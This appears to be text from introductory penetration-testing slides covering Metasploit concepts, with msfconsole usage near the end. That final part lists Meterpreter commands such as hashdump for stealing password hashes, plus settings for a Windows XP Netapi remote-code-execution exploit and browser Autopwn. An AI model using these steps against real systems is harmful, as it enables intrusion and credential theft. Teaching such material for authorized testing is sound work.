What is penetration testing ?
Why conduct a penetration testing?
What can be tested ?
What is metasploit ?
What is an exploit ?
What is payload ?
What is msfconsole ?
It’s the process to identify security
vulnerabilities in an application by evaluating
the system or network with various malicious
A penetration testing is a method of
evaluating the security of a computer system.
Purpose of this test is to secure important
data from outsiders like hackers who can
have unauthorized access to system.
Once vulnerability is identified it is used to
exploit system in order to gain access to
Causes of vulnerabilities:
- Design and development errors
- Poor system configuration
- Human errors
Financial data must be secured while
transferring between different systems.
Many clients are asking for pen testing as part
of the software release cycle.
Protecting your brand by avoiding loss of
consumer confidence and business
To secure user data.
To find security vulnerabilities in an
Operating system, applications, database,
networking equipments etc.
Dynamic websites, in-house applications etc.
Telephony (war-dialing, remote access etc.)
Personnel (screening process, social
Physical (access controls, dumpster diving
Wireless (wifi, Bluetooth, IR, GSM, RFID etc.)
The Metasploit project is an open-source,
computer security project which provides
information about security vulnerabilities and
aids in penetration testing and IDS signature
Metasploit is an framework which is used for
the hacking of different kinds of
Metasploit contain various exploits, payloads,
Metasploit Framework is especially used by
many of the hackers to generate payloads
and attack the systems.
As Metasploit is an open source where any
one can use it.This framework supports
different operating systems like windows,
linux ,mac os x etc.
Exploit used to take advantage of a
security flaw within a system, network, or
Payload is code that our victim computer
to execute by the Metasploit framework.
Module a small piece of code that can be
added to the Metasploit framework to
execute an attack.
Shell-code a small piece of code used as a
A vulnerability is a security hole in a piece of
software, hardware or operating system that
provides a potential angle to attack the
A vulnerability can be as simple as weak
passwords or as complex as buffer overflows
or SQL injection vulnerabilities.
To take advantage of a vulnerability, you
often need an exploit, a small and highly
specialized computer program whose only
reason of being is to take advantage of a
specific vulnerability and to provide access to
a computer system.
Exploits often deliver a payload to the target
system to grant the attacker access to the
A payload is the piece of software that lets you
control a computer system after it’s been
The payload is typically attached to and
delivered by the exploit.
Metasploit most popular payload is called
Meterpreter, which enables you to do all sorts of
funky stuff on the target system. For example,
you can upload and download files from the
system, take screenshots, and collect password
MSFconsole is an all-in-one interface to most
of the features in Metasploit.
MSFconsole can be used to launch attacks,
creating listeners, and much, much more.
▪ Session –l
▪ Session –i 1
Getuid -> show uid
Ps -> show active process
Migrate -> command used when hacker want
to migrate his process to any administrative
Hashdump -> to dump password hash.
Screenshot -> to take screenshot of victim.
Shell -> to enter into the victim shell.
upload C:<file name>
Netapi Exploit ( Remote Code Execution )
[Win XP SP-2,3]
set RHOST [target IP]
set PAYLOAD windows/meterpreter/bind_tcp
set LHOST [hacker IP]
Autopwn auxiliary [ combo of may exploits ]
set LHOST <My IP>
set SRVHOST < My Server is hosted on my
computer so again my IP >
set SRVPORT 80
set URIPATH /